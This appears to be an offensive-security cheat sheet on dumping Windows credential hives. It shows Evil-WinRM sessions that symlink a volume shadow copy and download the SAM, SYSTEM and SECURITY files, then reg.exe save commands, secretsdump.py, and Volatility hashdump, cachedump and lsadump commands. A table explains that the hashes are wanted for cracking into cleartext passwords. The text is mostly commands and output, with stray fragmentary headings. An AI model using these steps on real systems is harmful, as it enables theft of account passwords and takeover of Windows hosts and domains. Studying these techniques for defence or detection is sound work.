You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account
Shadow Copies
Enumerate the host for shadow copy volumes
*Evil-WinRM* PS C:\Users\Administrator\Documents> vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Contents of shadow copy set ID: {00168<-SNIP->d07ca}
Contained 1 shadow copies at creation time: 9/9/2019 3:10:57 AM
Shadow Copy ID: {04639<-SNIP->b017ef}
Original Volume: (C:)\\?\Volume{21385<-SNIP->0000}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: foo.bar.local
Service Machine: foo.bar.local
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cmd /c mklink /d C:\VSS \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
symbolic link created for C:\VSS <<===>> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SAM
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\\VSS\\windows\\system32\\config\\SAM to SAM
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SYSTEM
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\\VSS\\windows\\system32\\config\\SYSTEM to SYSTEM
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download C:\\VSS\\windows\\system32\\config\\SECURITY
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Downloading C:\\VSS\\windows\\system32\\config\\SECURITY to SECURITY
Info: Download successful!
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
$ secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
With Mimikatz
SAM
Windows
C:\WINDOWS\system32> reg.exe save hklm\sam C:\sam.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\system C:\system.save
The operation completed successfully.
C:\WINDOWS\system32> reg.exe save hklm\security C:\security.save
The operation completed successfully.
Dump memory acquisition from victim host - With WinPmem or FTK Imager
Hashdump / Lsadump
./vol.py -f file.dmp windows.hashdump.Hashdump #Grab common windows hashes (SAM+SYSTEM)
./vol.py -f file.dmp windows.cachedump.Cachedump #Grab domain cache hashes inside the registry
./vol.py -f file.dmp windows.lsadump.Lsadump #Grab lsa secrets
Resources
Registry Hive
Description
hklm\sam
Contains the hashes associated with local account passwords. We will need the hashes so we can crack them and get the user account passwords in cleartext.
hklm\system
Contains the system bootkey, which is used to encrypt the SAM database. We will need the bootkey to decrypt the SAM database.
hklm\security
Contains cached credentials for domain accounts. We may benefit from having this on a domain-joined Windows target.
